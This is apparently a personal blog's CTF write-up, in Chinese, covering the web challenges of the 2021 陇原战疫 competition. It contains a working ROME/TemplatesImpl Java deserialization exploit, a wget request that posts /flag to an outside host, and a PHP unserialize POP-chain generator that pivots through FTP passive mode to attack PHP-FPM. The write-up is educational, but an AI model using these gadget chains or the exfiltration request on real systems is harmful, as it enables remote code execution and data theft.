陇原战疫2021-WEB-WriteUp

Siebene-Blog

2021-11-08

EasyJaba

感觉这种上来就反序列化的题以后就不会咋出现了。有点像很久以前刚开始拿PHP做CTF考题的时候，不过这种题更多是帮助我这种菜鸡复习下基础。java出太难了我也不会，哈哈哈哈哈。

BlacklistObjectInputStream
protected Class<?> resolveClass(ObjectStreamClass cls) throws IOException, ClassNotFoundException {
        if (this.blacklist.contains(cls.getName())) {
            throw new InvalidClassException("Unexpected serialized class", cls.getName());
        } else {
            return super.resolveClass(cls);
        }
    }
 Set blacklist = new HashSet() {
            {
                this.add("java.util.HashMap");
                this.add("javax.management.BadAttributeValueExpException");
            }
        };

不能用这两个，有remo的依赖

map换成Hashtable就行了

package lyzy.ctf.ezjaba.payload;

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;

import com.sun.syndication.feed.impl.EqualsBean;
import com.sun.syndication.feed.impl.ObjectBean;

import javax.xml.transform.Templates;
import java.io.InputStream;
import java.lang.reflect.Field;
import java.util.Hashtable;


public class exp {
    public static void main(String[] args) throws Exception {

        // 生成包含恶意类字节码的 TemplatesImpl 类

        InputStream inputStream = evil.class.getResourceAsStream("evil.class");
        byte[] bytes = new byte[inputStream.available()];
        inputStream.read(bytes);

        TemplatesImpl tmpl = new TemplatesImpl();
        Field bytecodes = Reflections.getField(tmpl.getClass(),"_bytecodes");
        Reflections.setAccessible(bytecodes);
        Reflections.setFieldValue(tmpl,"_bytecodes",new byte[][]{bytes});

        Field name=Reflections.getField(tmpl.getClass(),"_name");
        Reflections.setAccessible(name);
        Reflections.setFieldValue(tmpl,"_name","Siebene");
        Reflections.setFieldValue(tmpl, "_tfactory", new TransformerFactoryImpl());

        // 使用 TemplatesImpl 初始化被包装类，使其 ToStringBean 也使用 TemplatesImpl 初始化
        ObjectBean delegate = new ObjectBean(Templates.class, tmpl);

        // 使用 ObjectBean 封装这个类，使其在调用 hashCode 时会调用 ObjectBean 的 toString
        // 先封装一个无害的类
        ObjectBean root = new ObjectBean(ObjectBean.class, new ObjectBean(String.class, "Sie"));

        // 放入 Map 中
        Hashtable map = new Hashtable();
        map.put(root,"Sie");


        // put 到 map 之后再反射写进去，避免触发漏洞
        Field field = ObjectBean.class.getDeclaredField("_equalsBean");
        field.setAccessible(true);
        field.set(root, new EqualsBean(ObjectBean.class, delegate));
        System.out.print(Serialize.serialize(map));


    }
}

evil.class用spring通用回显的就行了，用我上次哪个就行了哈

CheckIN

一道go简单审计

直接wget外带就行了

/wget?argv=1&argv=–post-file&argv=/flag&argv=http://ip

eaaasyphp

被考烂了的ftp被动模式

 <?php

class Check {
    public static $str1 = false;
    public static $str2 = false;
}


class Esle {
    public function __wakeup()
    {
        Check::$str1 = true;
    }
}


class Hint {
   

    public function __wakeup(){
        
        $this->hint = "no hint";
    }

    public function __destruct(){
        
        if(!$this->hint){
            $this->hint = "phpinfo";
            ($this->hint)();
        }  
    }
}


class Bunny {
    public function __construct(){
        $this->filename="ftp://ip:port/";
    }

    public function __toString()
    {
        if (Check::$str2) {
            if(!$this->data){
                echo "done !!!!\n";
                $this->data = $_REQUEST['data'];
            }
            file_put_contents($this->filename, $this->data);
        } else {
            throw new Error("Error");
        }
    }
}

class Welcome {

    public function __construct(){
        $this->username=new Bunny();
    }
    public function __invoke()
    {
        Check::$str2 = true;
        return "Welcome" . $this->username;
    }
}

class Bypass {

    public function __construct($s){
        if($s==1){
            $this->str4=new Welcome();
        }
        else{
            $this->str=new Hint();
        }
    }

    public function __destruct()
    {
         if (Check::$str1) {
             ($this->str4)();
         } else {
             throw new Error("Error");
         }
    }
}

echo urlencode(serialize(array(new Esle(),new Bypass(1))));

然后?data=xxxxxxxx,这里直接传打fpm的二进制流就行了

还有两道题，一道smtp，当时没时间看了，后来看了guoke爷爷的wp会了

还有一道rss blog也是0解，好像下次还会接着用吧